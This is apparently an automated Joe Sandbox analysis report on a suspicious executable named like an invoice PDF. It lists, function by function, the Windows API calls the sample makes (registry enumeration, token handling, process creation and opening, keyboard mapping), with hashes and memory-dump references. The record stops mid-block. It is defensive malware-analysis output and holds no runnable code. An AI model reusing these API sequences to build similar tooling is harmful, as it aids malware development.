Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 32a539a2e8659de3411d454d0271453b1558fa1f381ee0f743e755c2849ab4b9
Instruction ID: 08792b7ba3183a3762053034266875ea390e27941e422d4b1903377c80dd72d7
Opcode Fuzzy Hash: 32a539a2e8659de3411d454d0271453b1558fa1f381ee0f743e755c2849ab4b9
Instruction Fuzzy Hash: 48512472600256ABFB259F64CC81EAF7BA9EF46710F16426BFC05D6240DB3CDC40C66A

Function 0049BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

Part of subcall function 0049C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0049B6AE,?,?), ref: 0049C9B5
Part of subcall function 0049C998: _wcslen.LIBCMT ref: 0049C9F1
Part of subcall function 0049C998: _wcslen.LIBCMT ref: 0049CA68
Part of subcall function 0049C998: _wcslen.LIBCMT ref: 0049CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0049BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0049BD25
RegCloseKey.ADVAPI32(00000000), ref: 0049BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0049BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0049BDF3
RegCloseKey.ADVAPI32(?), ref: 0049BDFF

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: a9f01aba35f412ee0e926529856cba70201a6fb7e66a01764527dddd31a27efb
Instruction ID: be57c2d582a13b8435e86927679a46912f523a4374cf047bf12102d224957fb4
Opcode Fuzzy Hash: a9f01aba35f412ee0e926529856cba70201a6fb7e66a01764527dddd31a27efb
Instruction Fuzzy Hash: 8381DD30208200AFCB14DF20D884E6ABBE5FF84308F14896EF4594B2A2DB35ED45CB96

Function 0046F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0046F7B9
SysAllocString.OLEAUT32(00000001), ref: 0046F860
VariantCopy.OLEAUT32(0046FA64,00000000), ref: 0046F889
VariantClear.OLEAUT32(0046FA64), ref: 0046F8AD
VariantCopy.OLEAUT32(0046FA64,00000000), ref: 0046F8B1
VariantClear.OLEAUT32(?), ref: 0046F8BB

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: f3b43f721847c897f411ed0f6ecbaa374eacf9d54d8791cddd8260a4e76c43be
Instruction ID: 39739ae8b2f115f53030ea3b63a812cd6793bdd48726e099c0b1ea6ef1983e18
Opcode Fuzzy Hash: f3b43f721847c897f411ed0f6ecbaa374eacf9d54d8791cddd8260a4e76c43be
Instruction Fuzzy Hash: EC51E971610310BACF10AB66E895B29B3A4EF45314F20447BE946DF291FB789C49C79F

Function 0048910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00417620: _wcslen.LIBCMT ref: 00417625

Part of subcall function 00416B57: _wcslen.LIBCMT ref: 00416B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 004894E5
_wcslen.LIBCMT ref: 00489506
_wcslen.LIBCMT ref: 0048952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00489585

Strings

X, xrefs: 00489412

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 023a1448913c2dca5641de8f3f46b8b710cb52cb91e2d5f731597675a8101c3a
Instruction ID: f7a77bbc4ea995dcc8ce3c6660a8f1fb99c9f336fc6429c5337dcca31ac4c31c
Opcode Fuzzy Hash: 023a1448913c2dca5641de8f3f46b8b710cb52cb91e2d5f731597675a8101c3a
Instruction Fuzzy Hash: 29E1B6315047009FD714EF25C881AAEB7E1BF85318F08896EF8999B391DB34DD45CB99

Function 0042920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00429BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00429BB2

BeginPaint.USER32(?,?,?), ref: 00429241
GetWindowRect.USER32(?,?), ref: 004292A5
ScreenToClient.USER32(?,?), ref: 004292C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004292D3
EndPaint.USER32(?,?,?,?,?), ref: 00429321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004671EA

Part of subcall function 00429339: BeginPath.GDI32(00000000), ref: 00429357

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 72cad3d36e04ed09d64d74d7880cf55430a2b78e874b7f329a77fe2d10a71600
Instruction ID: 6034aaa4e55575bdf0aa3a0fa7d2e1413272dd3e658d1a97844b9e5c3fc0697a
Opcode Fuzzy Hash: 72cad3d36e04ed09d64d74d7880cf55430a2b78e874b7f329a77fe2d10a71600
Instruction Fuzzy Hash: 8141A170204210AFD710DF25DCC4FBA7BA8EF4A724F04066AF9548B2B2D7389C45DB6A

Function 004807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0048080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00480847
EnterCriticalSection.KERNEL32(?), ref: 00480863
LeaveCriticalSection.KERNEL32(?), ref: 004808DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004808F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00480921

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: aa4c6526e5814b2f457a479dfbb0775aea234df2d1905b7f4bea03764d19bc80
Instruction ID: 23546aaab79aade105d2a92eb994ff35ddc13e6bf4c3c2ecd305efc941eeff80
Opcode Fuzzy Hash: aa4c6526e5814b2f457a479dfbb0775aea234df2d1905b7f4bea03764d19bc80
Instruction Fuzzy Hash: A0418B71A00205EBDF15AF54DC85AAA7778FF04304F5044BAED00AA297DB34DE68DBA8

Function 004A81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0046F3AB,00000000,?,?,00000000,?,0046682C,00000004,00000000,00000000), ref: 004A824C
EnableWindow.USER32(00000000,00000000), ref: 004A8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 004A82D1
ShowWindow.USER32(00000000,00000004), ref: 004A82E5
EnableWindow.USER32(00000000,00000001), ref: 004A830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004A832F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: b5dc2a36551623c901a162104724f3f712abc3599ad27a2d8ce1f4f42292cd60
Instruction ID: 4885e7855455d33656b92683b48d2dc7f613daad38af60fa9af44eff188f5a09
Opcode Fuzzy Hash: b5dc2a36551623c901a162104724f3f712abc3599ad27a2d8ce1f4f42292cd60
Instruction Fuzzy Hash: 5D418C75601644AFDF21CF15D8D9BA57BE0FB1B714F1801AAEA484F2B3CB36A841CB48

Function 00474C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00474C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00474CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00474CEA
_wcslen.LIBCMT ref: 00474D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00474D10
_wcsstr.LIBVCRUNTIME ref: 00474D1A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 38b88a4bb76e01ebfc3fdcd6ac9c70b4054ac865a3fe6e6b168d96fed177315e
Instruction ID: 41177ba51f8c10e7beae0a095ce292d86f1b12f90b2af649872799cd8941021b
Opcode Fuzzy Hash: 38b88a4bb76e01ebfc3fdcd6ac9c70b4054ac865a3fe6e6b168d96fed177315e
Instruction Fuzzy Hash: CC21FF712041107BE7259B35AD45EBB7F9CDF85750F11807FF809CA151DF69DC0196A4

Function 0048581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00413AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00413A97,?,?,00412E7F,?,?,?,00000000), ref: 00413AC2

_wcslen.LIBCMT ref: 0048587B
CoInitialize.OLE32(00000000), ref: 00485995
CoCreateInstance.OLE32(004AFCF8,00000000,00000001,004AFB68,?), ref: 004859AE
CoUninitialize.OLE32 ref: 004859CC

Strings

.lnk, xrefs: 00485876, 004858C1, 00485985

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 1c13495b636aeca801d8f054331de20fa0cf3317e872da937d52401a91145bc9
Instruction ID: 1f241cee7ad67021fafe78226c8e2e1a15611d7450086d2c0c520245b3ce15a1
Opcode Fuzzy Hash: 1c13495b636aeca801d8f054331de20fa0cf3317e872da937d52401a91145bc9
Instruction Fuzzy Hash: CFD144716046019FC714EF25C480A6EBBE2FF89718F14885EF8899B361D739EC45CB9A

Function 0047175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00470FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00470FCA
Part of subcall function 00470FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00470FD6
Part of subcall function 00470FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00470FE5
Part of subcall function 00470FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00470FEC
Part of subcall function 00470FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00471002

GetLengthSid.ADVAPI32(?,00000000,00471335), ref: 004717AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004717BA
HeapAlloc.KERNEL32(00000000), ref: 004717C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 004717DA
GetProcessHeap.KERNEL32(00000000,00000000,00471335), ref: 004717EE
HeapFree.KERNEL32(00000000), ref: 004717F5

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 713752c9510535fc862bbcb1e67439a462adb0fa9335662028b91e6e4304af82
Instruction ID: 39f37885331c193b6c0bd358c72011c24584806004971767b5060491a8fac03d
Opcode Fuzzy Hash: 713752c9510535fc862bbcb1e67439a462adb0fa9335662028b91e6e4304af82
Instruction Fuzzy Hash: 8D118E71601205FFDB189FA8CC89BEFBBA9EB46355F10802AF44597220D739A944CF68

Function 004714CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004714FF
OpenProcessToken.ADVAPI32(00000000), ref: 00471506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00471515
CloseHandle.KERNEL32(00000004), ref: 00471520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00471563

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 0d09d6919cd0f005675ec209c84f50e23e76bc35b7ae51b336fd4fb1b33fd804
Instruction ID: 2f1594f55a7c8cb2294521a8c34156db9a8aa7a81e0dec2a4c56a20469988dd3
Opcode Fuzzy Hash: 0d09d6919cd0f005675ec209c84f50e23e76bc35b7ae51b336fd4fb1b33fd804
Instruction Fuzzy Hash: 9011267650020ABBDF118FA8DE89BDF7BA9EF49744F048025FA09A2160C3758E65DB64

Function 00433382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00433379,00432FE5), ref: 00433390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004333B7
SetLastError.KERNEL32(00000000,?,00433379,00432FE5), ref: 00433409

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ff393f29c30398d1af55627c926f68fd1725a27a58d55e15f24a195c008f9052
Instruction ID: ee87cfb10787d4b11fea635c66c6473afc9bf668c8963e6ba6ff383981fa8817
Opcode Fuzzy Hash: ff393f29c30398d1af55627c926f68fd1725a27a58d55e15f24a195c008f9052
Instruction Fuzzy Hash: 7A01F53220A312BEAA252FB66CC66576B54DB1D77BF20923FF810812F1EF194D01914C

Function 00442D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00445686,00453CD6,?,00000000,?,00445B6A,?,?,?,?,?,0043E6D1,?,004D8A48), ref: 00442D78
_free.LIBCMT ref: 00442DAB
_free.LIBCMT ref: 00442DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0043E6D1,?,004D8A48,00000010,00414F4A,?,?,00000000,00453CD6), ref: 00442DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0043E6D1,?,004D8A48,00000010,00414F4A,?,?,00000000,00453CD6), ref: 00442DEC
_abort.LIBCMT ref: 00442DF2

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 87b26909f72037bad5c5d086486b1020b940d93f18a23cd448839f0232acdda1
Instruction ID: da92441ee169492da4535394740f22c8a52c034306245e407036841f70511c34
Opcode Fuzzy Hash: 87b26909f72037bad5c5d086486b1020b940d93f18a23cd448839f0232acdda1
Instruction Fuzzy Hash: AEF02DB194590137F65237367E46F5F2A55AFC2765F64002FF824922D2DEFC8801426C

Function 004A8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00429639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00429693
Part of subcall function 00429639: SelectObject.GDI32(?,00000000), ref: 004296A2
Part of subcall function 00429639: BeginPath.GDI32(?), ref: 004296B9
Part of subcall function 00429639: SelectObject.GDI32(?,00000000), ref: 004296E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 004A8A4E
LineTo.GDI32(?,00000003,00000000), ref: 004A8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 004A8A70
LineTo.GDI32(?,00000000,00000003), ref: 004A8A80
EndPath.GDI32(?), ref: 004A8A90
StrokePath.GDI32(?), ref: 004A8AA0

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: b6c18d542ec193f35e011439873e7249bcde06685e767de20389c9ba3aade09f
Instruction ID: 2763b2413425744688e43200f531a1f45c9e2f9b88bac5330b09e51f8288fde3
Opcode Fuzzy Hash: b6c18d542ec193f35e011439873e7249bcde06685e767de20389c9ba3aade09f
Instruction Fuzzy Hash: B611177604414CFFEF129F90DC88EAA7FACEB09354F008026BA199A1A1C7719D55DFA4

Function 004751FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00475218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00475229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00475230
ReleaseDC.USER32(00000000,00000000), ref: 00475238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0047524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00475261

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 56a657c657abbaf1ae1b2fa63b866ad810472cae7daa1520dd3baeb040bf8ccd
Instruction ID: b478207ead9bded2994e5a75cdca39e5f22044c99e0cd918db43bcb14021a8ec
Opcode Fuzzy Hash: 56a657c657abbaf1ae1b2fa63b866ad810472cae7daa1520dd3baeb040bf8ccd
Instruction Fuzzy Hash: AF014475A00714BBEB109BA59C49A9EBFB9EB45751F044066FA04AB381D6709C01CFA4

Function 00411BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00411BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00411BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00411C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00411C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00411C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00411C22

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b82c27ef77be373fb79d768c11b49100e3c2383e9df10edc1a26d8b66baebb76
Instruction ID: d493e9c988888cf1d66a9505dcfddd78373853669c9bcba617f077a56dc52d90
Opcode Fuzzy Hash: b82c27ef77be373fb79d768c11b49100e3c2383e9df10edc1a26d8b66baebb76
Instruction Fuzzy Hash: 880167B0902B5ABDE3008F6A8C85B52FFE8FF19354F04411BA15C4BA42C7F5A864CBE5

Function 0047EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0047EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0047EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0047EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0047EB64
